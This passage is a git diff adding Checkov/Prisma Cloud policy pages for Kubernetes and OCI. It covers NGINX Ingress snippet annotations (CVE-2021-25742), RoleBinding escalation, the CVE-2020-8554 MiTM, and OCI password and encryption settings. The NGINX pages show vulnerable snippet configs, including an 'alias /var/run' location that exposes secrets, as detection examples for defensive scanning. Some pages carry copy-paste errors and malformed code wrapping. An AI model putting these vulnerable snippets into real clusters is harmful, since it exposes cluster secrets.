b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-all-nginx-ingress-annotation-snippets.adoc @@ -0,0 +1,69 @@ +== NGINX Ingress has annotation snippets +// NGINX Ingress includes annotation snippets + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5a7e7941-f1c4-4ddf-af78-155e0e0222d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py[CKV_K8S_153] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allowing custom snippet annotations in ingress-nginx enables a user, who can create or update ingress objects, to obtain all secrets in the cluster. +The safest way is to disallow any usage of annotation snippets. +Learn more around https://nvd.nist.gov/vuln/detail/CVE-2021-25742[CVE-2021-25742] + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,yaml] +---- +{ + "apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: app-ingress + annotations: +- nginx.ingress.kubernetes.io/server-snippet: | +- location / { +- return 200 'OK'; +- } + kubernetes.io/ingress.class: "nginx" +spec: + rules: + - http: + paths: + - path: /exp + pathType: Prefix + backend: + service: + name: some-service + port: + number: 1234", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc new file mode 100644 index 000000000..92014e903 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc @@ -0,0 +1,73 @@ +== NGINX Ingress has annotation snippets which contain alias statements +// NGINX Ingress includes annotation snippets which contain alias state + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5ca59fca-d24c-4c9e-8abc-9cb8355653d9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py[CKV_K8S_154] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allowing custom snippet annotations in ingress-nginx enables a user, who can create or update ingress objects, to obtain all secrets in the cluster. +To still allow users leveraging the snippet feature it is recommend to remove any usage of alias. +Learn more around https://nvd.nist.gov/vuln/detail/CVE-2021-25742[CVE-2021-25742] + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,yaml] +---- +{ + "apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: example-ingress + namespace: developer + annotations: + kubernetes.io/ingress.class: nginx + nginx.ingress.kubernetes.io/rewrite-target: /$2 + nginx.ingress.kubernetes.io/server-snippet: | + location ^~ "/test" { + default_type 'text/plain'; +- alias /var/run; + } + +spec: + rules: + - http: + paths: + - path: /test + pathType: Prefix + backend: + service: + name: web + port: + number: 8080", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc new file mode 100644 index 000000000..593b3b78d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc @@ -0,0 +1,71 @@ +== NGINX Ingress annotation snippets contains LUA code execution +// NGINX Ingress annotation snippets contain LUA code execution + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 20885512-6025-4c23-a14d-b0ca7b63ed11 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py[CKV_K8S_152] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allowing custom snippet annotations in ingress-nginx enables a user, who can create or update ingress objects, to obtain all secrets in the cluster. +To still allow users leveraging the snippet feature it is recommend to remove any usage of LUA code. +Learn more around https://nvd.nist.gov/vuln/detail/CVE-2021-25742[CVE-2021-25742] + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,yaml] +---- +{ + "apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: app-ingress + annotations: + nginx.ingress.kubernetes.io/server-snippet: | +- lua_package_path "/etc/nginx/lua/?.lua;;"; + location / { + return 200 'OK'; + } + + kubernetes.io/ingress.class: "nginx" +spec: + rules: + - http: + paths: + - path: /exp + pathType: Prefix + backend: + service: + name: some-service + port: + number: 1234", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc new file mode 100644 index 000000000..c1709b8cc --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc @@ -0,0 +1,62 @@ +== RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding +// RoleBinding should not allow privilege escalation to a ServiceAccount or Node on another RoleBinding + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 95361a8b-7942-416d-bd19-87b2c8f57d41 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml[CKV2_K8S_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, a RoleBinding is used to grant specific permissions to a user or group of users. +These permissions, also known as "roles," determine what actions a user is allowed to perform within a Kubernetes cluster. +It is important to ensure that RoleBindings are configured in a way that does not allow privilege escalation. +This means that a user with a RoleBinding should not be able to gain access to privileges that they are not explicitly granted through their RoleBinding. +Allowing privilege escalation would mean that a user could potentially gain unauthorized access to sensitive information or perform actions that they are not supposed to be able to perform. +This could pose a security risk to the cluster, so it is important to prevent privilege escalation in RoleBindings. +One way to prevent privilege escalation in RoleBindings is to make sure that they are not granted to ServiceAccounts or Nodes. +This is because ServiceAccounts and Nodes are not typically associated with individual users, so granting a RoleBinding to them could potentially allow any user who is able to access the ServiceAccount or Node to gain the privileges granted by the RoleBinding. +This could lead to privilege escalation, so it is generally best to avoid granting RoleBindings to ServiceAccounts and Nodes. + +=== Fix - Buildtime + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: RoleBinding +metadata: + name: restricted-access +subjects: +- kind: ServiceAccount + name: my-service-account +- kind: Node + name: my-node +roleRef: + kind: ClusterRole + name: restricted-access + apiGroup: rbac.authorization.k8s.io", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc new file mode 100644 index 000000000..11f8fce5d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc @@ -0,0 +1,56 @@ +== ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 28c7c577-3842-43dd-b0d2-c0bbcc9cb7c8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml[CKV2_K8S_4] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, a ServiceAccount is an account that is associated with a specific service. +A ServiceAccount can be granted specific permissions, known as "roles," that determine what actions it is allowed to perform within a Kubernetes cluster. +One potential issue with ServiceAccounts is that they can be used to exploit a vulnerability known as CVE-2020-8554. +This vulnerability allows a ServiceAccount that has the ability to modify services and their status to set the status.loadBalancer.ingress.ip field to an arbitrary IP address. +If a ServiceAccount with these permissions sets the status.loadBalancer.ingress.ip field to an IP address that they control, they would be able to launch a man-in-the-middle (MiTM) attack against the cluster. +This would allow them to intercept and modify traffic between the cluster and the specified IP address, potentially allowing them to gain access to sensitive information or perform unauthorized actions. +To prevent this type of attack, it is important to ensure that ServiceAccounts with the ability to modify services and their status do not have the ability to set the status.loadBalancer.ingress.ip field. +This can be done by carefully configuring the roles and permissions associated with the ServiceAccounts in the cluster. +It is also important to note that nodes, which are the physical or virtual machines that run the Kubernetes cluster, can also potentially exploit the CVE-2020-8554 vulnerability if they have the ability to modify services and their status. +Therefore, it is also important to ensure that nodes do not have these permissions to prevent potential MiTM attacks against the cluster. + +=== Fix - Buildtime + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: ServiceAccount +metadata: + name: my-service-account + annotations: + services/status/patch: "[]"", +} +---- + diff --git a/code-security/policy-reference/oci-policies/compute/compute.adoc b/code-security/policy-reference/oci-policies/compute/compute.adoc new file mode 100644 index 000000000..78f21157c --- /dev/null +++ b/code-security/policy-reference/oci-policies/compute/compute.adoc @@ -0,0 +1,19 @@ +== Compute + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc[OCI Compute Instance boot volume has in-transit data encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py[CKV_OCI_4] +|HIGH + + +|xref:ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc[OCI Compute Instance has Legacy MetaData service endpoint enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py[CKV_OCI_5] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc new file mode 100644 index 000000000..411fa30ce --- /dev/null +++ b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc @@ -0,0 +1,93 @@ +== OCI Compute Instance boot volume has in-transit data encryption is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 85e6e5a1-79e8-40ce-8d38-274b05168666 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py[CKV_OCI_4] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Compute Instances that are configured with disabled in-transit data encryption boot or block volumes. +It is recommended that Compute Instance boot or block volumes should be configured with in-transit data encryption to minimize risk for sensitive data being leaked. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click Edit + +. Click on Show Advanced Options + +. Select USE IN-TRANSIT ENCRYPTION + +. Click Save Changes Note : To update the instance properties, the instance must be rebooted. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_instance +* *Arguments:* is_pv_encryption_in_transit_enabled + + +[source,go] +---- +{ + "resource "oci_core_instance" "pass" { +... + + } + + ipxe_script = var.instance_ipxe_script + is_pv_encryption_in_transit_enabled = var.instance_is_pv_encryption_in_transit_enabled + + launch_options { + boot_volume_type = var.instance_launch_options_boot_volume_type + firmware = var.instance_launch_options_firmware + is_consistent_volume_naming_enabled = var.instance_launch_options_is_consistent_volume_naming_enabled + is_pv_encryption_in_transit_enabled = true + network_type = var.instance_launch_options_network_type + remote_data_volume_type = var.instance_launch_options_remote_data_volume_type + } + +... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc new file mode 100644 index 000000000..f4eaad419 --- /dev/null +++ b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc @@ -0,0 +1,89 @@ +== OCI Compute Instance has Legacy MetaData service endpoint enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a38a8110-054c-4a3b-af99-5e452e564e54 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py[CKV_OCI_5] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Compute Instances that are configured with Legacy MetaData service (IMDSv1) endpoints enabled. +It is recommended that Compute Instances should be configured with legacy v1 endpoints (Instance Metadata Service v1) being disabled, and use Instance Metadata Service v2 instead following security best practices. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. In the Instance Details section, next to Instance Metadata Service, click Edit. + +. For the Allowed IMDS version, select the Version 2 only option. + +. Click Save Changes. ++ +Note : If you disable IMDSv1 on an instance that does not support IMDSv2, you might not be able to connect to the instance when you launch it. ++ +To re enable IMDSv1: using the Console, on the Instance Details page, next to Instance Metadata Service, click Edit. ++ +Select the Version 1 and version 2 option, save your changes, and then restart the instance. ++ +Using the API, use the UpdateInstance operation. ++ +FMI : https://docs.cloud.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm#upgrading-v2 +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_instance +* *Arguments:* instance_options.are_legacy_imds_endpoints_disabled + + +[source,go] +---- +{ + "resource "oci_core_instance" "pass" { +... + instance_options { + are_legacy_imds_endpoints_disabled = true + } + +... +}", + +} +---- diff --git a/code-security/policy-reference/oci-policies/iam/iam.adoc b/code-security/policy-reference/oci-policies/iam/iam.adoc new file mode 100644 index 000000000..073affeeb --- /dev/null +++ b/code-security/policy-reference/oci-policies/iam/iam.adoc @@ -0,0 +1,34 @@ +== IAM + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc[OCI IAM password policy for local (non-federated) users does not have minimum 14 characters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordLength.py[CKV_OCI_18] +|HIGH + + +|xref:oci-iam-password-policy-must-contain-lower-case.adoc[OCI IAM password policy for local (non-federated) users does not have a lowercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py[CKV_OCI_11] +|HIGH + + +|xref:oci-iam-password-policy-must-contain-numeric-characters.adoc[OCI IAM password policy for local (non-federated) users does not have a number] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py[CKV_OCI_12] +|HIGH + + +|xref:oci-iam-password-policy-must-contain-special-characters.adoc[OCI IAM password policy for local (non-federated) users does not have a symbol] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py[CKV_OCI_13] +|HIGH + + +|xref:oci-iam-password-policy-must-contain-uppercase-characters.adoc[OCI IAM password policy for local (non-federated) users does not have an uppercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py[CKV_OCI_14] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc new file mode 100644 index 000000000..69a1da686 --- /dev/null +++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc @@ -0,0 +1,81 @@ +== OCI IAM password policy for local (non-federated) users does not have minimum 14 characters + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dee1d98b-0a20-467b-8f2e-a33d79717d04 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordLength.py[CKV_OCI_18] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Oracle Cloud Infrastructure(OCI) accounts that do not have a minimum of 14 characters in the password policy for local (non-federated) users. +As a security best practice, configure a strong password policy for secure access to the OCI console. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/ + +. Go to Identity in the Services menu. + +. Select Authentication Settings from the Identity menu. + +. Click Edit Authentication Settings in the middle of the page. + +. Type the number in range 14-100 into the box below the text: MINIMUM PASSWORD LENGTH (IN CHARACTERS). ++ +Note : The console URL is region specific, your tenancy might have a different home region and thus console URL. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_identity_authentication_policy +* *Arguments:* password_policy.minimum_password_length + + +[source,go] +---- +{ + "resource "oci_identity_authentication_policy" "pass" { + + compartment_id = var.tenancy_id + + password_policy { +... + minimum_password_length = 14 + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-lower-case.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-lower-case.adoc new file mode 100644 index 000000000..4446dd3b3 --- /dev/null +++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-lower-case.adoc @@ -0,0 +1,80 @@ +== OCI IAM password policy for local (non-federated) users does not have a lowercase character + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 31f6c364-9023-4bf1-8679-f31cd660a18d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py[CKV_OCI_11] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Oracle Cloud Infrastructure(OCI) accounts that do not have a lowercase character in the password policy for local (non-federated) users. +As a security best practice, configure a strong password policy for secure access to the OCI console. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/ + +. Go to Identity in the Services menu. + +. Select Authentication Settings from the Identity menu. ++ +4.Click Edit Authentication Settings in the middle of the page. ++ +5.Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 LOWERCASE CHARACTER. ++ +Note : The console URL is region specific, your tenancy might have a different home region and thus console URL. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_identity_authentication_policy +* *Arguments:* password_policy.is_lowercase_characters_required + + +[source,go] +---- +{ + "resource "oci_identity_authentication_policy" "pass" { +... + + password_policy { + is_lowercase_characters_required = true +... + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-numeric-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-numeric-characters.adoc new file mode 100644 index 000000000..c5648884c --- /dev/null +++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-numeric-characters.adoc @@ -0,0 +1,80 @@ +== OCI IAM password policy for local (non-federated) users does not have a number + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 32e382d2-6925-47d7-a6ff-5310153cf8d7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py[CKV_OCI_12] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Oracle Cloud Infrastructure(OCI) accounts that do not have a lowercase character in the password policy for local (non-federated) users. +As a security best practice, configure a strong password policy for secure access to the OCI console. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/ + +. Go to Identity in the Services menu. + +. Select Authentication Settings from the Identity menu. ++ +4.Click Edit Authentication Settings in the middle of the page. ++ +5.Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 LOWERCASE CHARACTER. ++ +Note : The console URL is region specific, your tenancy might have a different home region and thus console URL. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_identity_authentication_policy +* *Arguments:* password_policy.is_numeric_characters_required + + +[source,go] +---- +{ + "resource "oci_identity_authentication_policy" "pass" { +... + password_policy { + ... + is_numeric_characters_required = true + ... + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-special-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-special-characters.adoc new file mode 100644 index 000000000..d41d0311d --- /dev/null +++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-special-characters.adoc @@ -0,0 +1,82 @@ +== OCI IAM password policy for local (non-federated) users does not have a symbol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fd39d77b-3d8b-4a35-9764-fc9ffcd7959d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py[CKV_OCI_13] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Oracle Cloud Infrastructure(OCI) accounts that do not have a symbol in the password policy for local (non-federated) users. +As a security best practice, configure a strong password policy for secure access to the OCI console. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/ + +. Go to Identity in the Services menu. + +. Select Authentication Settings from the Identity menu. + +. Click Edit Authentication Settings in the middle of the page. + +. Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 SPECIAL CHARACTER. ++ +Note : The console URL is region specific, your tenancy might have a different home region and thus console URL. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_identity_authentication_policy +* *Arguments:* password_policy.is_special_characters_required + + +[source,go] +---- +{ + "resource "oci_identity_authentication_policy" "pass" { + + compartment_id = var.tenancy_id + + password_policy { + ... + is_special_characters_required = true + ... + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-uppercase-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-uppercase-characters.adoc new file mode 100644 index 000000000..11a033c04 --- /dev/null +++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-uppercase-characters.adoc @@ -0,0 +1,80 @@ +== OCI IAM password policy for local (non-federated) users does not have an uppercase character + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3772cf24-3db1-46ac-8332-f04a02bb184e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py[CKV_OCI_14] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Oracle Cloud Infrastructure(OCI) accounts that do not have an uppercase character in the password policy for local (non-federated) users. +As a security best practice, configure a strong password policy for secure access to the OCI console. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console Page:https://console.ap-mumbai-1.oraclecloud.com/ + +. Go to Identity in the Services menu. + +. Select Authentication Settings from the Identity menu. + +. Click Edit Authentication Settings in the middle of the page. + +. Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 UPPERCASE CHARACTER. ++ +Note : The console URL is region specific, your tenancy might have a different home region and thus console URL. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_identity_authentication_policy +* *Arguments:* password_policy.is_uppercase_characters_required + + +[source,go] +---- +{ + "resource "oci_identity_authentication_policy" "pass" { +... + password_policy { + ... + is_uppercase_characters_required = true + ... + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/logging/ensure-oci-compute-instance-has-monitoring-enabled.adoc b/code-security/policy-reference/oci-policies/logging/ensure-oci-compute-instance-has-monitoring-enabled.adoc new file mode 100644 index 000000000..42b839884 --- /dev/null +++ b/code-security/policy-reference/oci-policies/logging/ensure-oci-compute-instance-has-monitoring-enabled.adoc @@ -0,0 +1,81 @@ +== OCI Compute Instance has monitoring disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6750266c-3d25-408e-b6a1-18a181f12047 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py[CKV_OCI_6] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Compute Instances that are configured with Monitoring disabled. +It is recommended that Compute Instances should be configured with monitoring is enabled following security best practices. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Under Resources, click Metrics. + +. Click Enable monitoring. ++ +(If monitoring is not enabled (and the instance uses a supported image), then a button is available to enable monitoring.) ++ +FMI : https://docs.cloud.oracle.com/en-us/iaas/Content/Compute/Tasks/enablingmonitoring.htm#ExistingEnabling +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_instance +* *Arguments:* agent_config.is_monitoring_disabled + + +[source,go] +---- +{ + "resource "oci_core_instance" "pass" { + ... + agent_config { + ... + is_monitoring_disabled = false + .... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/logging/logging.adoc b/code-security/policy-reference/oci-policies/logging/logging.adoc new file mode 100644 index 000000000..5369aa847 --- /dev/null +++ b/code-security/policy-reference/oci-policies/logging/logging.adoc @@ -0,0 +1,14 @@ +== Logging + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-oci-compute-instance-has-monitoring-enabled.adoc[OCI Compute Instance has monitoring disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py[CKV_OCI_6] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc b/code-security/policy-reference/oci-policies/networking/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc new file mode 100644 index 000000000..2cee3ea71 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc @@ -0,0 +1,63 @@ +== GCP VPC Network subnets have Private Google access disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ec842076-78f1-4c9c-86dc-e1c0e00f6150 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py[CKV_GCP_76] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling Private Google Access for IPv6 can help improve the security of your Google Cloud Platform (GCP) resources by allowing them to access Google APIs and services over IPv6 networks, rather than over the public internet. +This can help reduce the risk of your traffic being intercepted or tampered with, as it is routed through Google's private network. +Additionally, Private Google Access can help improve the performance and reliability of your GCP resources by reducing network latency and eliminating the need to route traffic through third-party networks. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + " +resource "google_compute_subnetwork" "pass_bidi" { + name = "log-test-subnetwork" + ip_cidr_range = "10.2.0.0/16" + stack_type = "IPV4_IPV6" + ipv6_access_type = "EXTERNAL" + region = "us-central1" + network = google_compute_network.custom-test.id + # purpose="INTERNAL_HTTPS_LOAD_BALANCER" if set ignored + # log_config { + # metadata="EXCLUDE_ALL_METADATA" + # } + private_ip_google_access = true + private_ipv6_google_access = "ENABLE_BIDIRECTIONAL_ACCESS_TO_GOOGLE" +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-group-has-stateless-ingress-security-rules.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-group-has-stateless-ingress-security-rules.adoc new file mode 100644 index 000000000..f2c5d2919 